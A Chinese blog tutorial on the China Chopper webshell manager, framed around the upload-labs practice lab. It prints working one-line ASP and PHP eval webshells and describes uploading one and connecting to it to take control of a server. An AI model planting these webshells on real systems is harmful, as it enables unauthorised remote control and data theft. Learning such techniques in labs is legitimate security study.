菜刀的安装大家在网上随便一搜就很多,这里不再和大家详解,主要是讲解一下菜刀的原理及使用;
1.中国菜刀支持的服务端脚本:PHP、ASP;(常用的脚本就这两种)
2.主要功能有:文件管理(有足够的权限时候可以管理整个磁盘/文件系统),数据库管理,虚拟终端。
3.菜刀的工作原理是:利用上传到服务器的一句话木马再通过一些添加配置就可以工作了
一句话木马:
Asp: <%eval request("x")%>
php: <?php @eval($_POST['x']);?>
我们就拿上一篇博客upload-labs教程(一)来讲一下:
在上一篇中,我们通过文件长传漏洞成功将我们的一句话木马写入服务器中,这时我们就需要通过菜刀进入到对方的电脑中;
首先,我们先将一句话木马写入事先准备好的zqlone.php中,如图:
1
然后就根据上一篇博客upload-labs教程(一)进行抓包:
2
3
4
将这些信息填到相应的位置,然后点击添加!!
5
成功进入到对方电脑中!!!
菜刀的安装大家在网上随便一搜就很多,这里不再和大家详解,主要是讲解一下菜刀的原理及使用; 1.中国菜刀支持的服务端...
中国菜刀 中国菜刀是一个集成型webshell管理工具,windows平台使用。建议在虚拟机中使用,主流杀毒软件会...
最近给新加入俱乐部的同学讲了一下菜刀的使用,菜刀有老版菜刀还有新版菜刀。 老版菜刀记得说是C#写的 emmmm,打...
前言 听说中国菜刀里有后门。抓包我是没有监测到异常数据包。为了以防万一,且更好使用中国菜刀硬杠安全狗。笔者收集了一...
中国菜刀配合一句话木马基本使用 菜刀的主要功能是用来连接一句话木马的,asp、aspx、php的一句话菜刀都可以连...
中国菜刀用过java写的Cknife,用过C写的Chopper,这次自己手写中国菜刀WebShell才体会...
中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只...
今日晚分享 【为什么现在教育孩子这么难???】 [菜刀][菜刀]中国社会的深刻转型和快速变迁,导致了人们普遍的身心...
解压之后是一个数据包文件。 用Wireshark打开分析一下。 在第九个数据包中看到了flag.tar.gz这个文...
剧名:菜刀班尖刀连 其它译名:菜刀班 上映时间:2014年 导演:包福明 类型:战争 地区:中国大陆 1.龙四...
本文标题:中国菜刀的使用
本文链接:https://www.haomeiwen.com/subject/jqbasftx.html
网友评论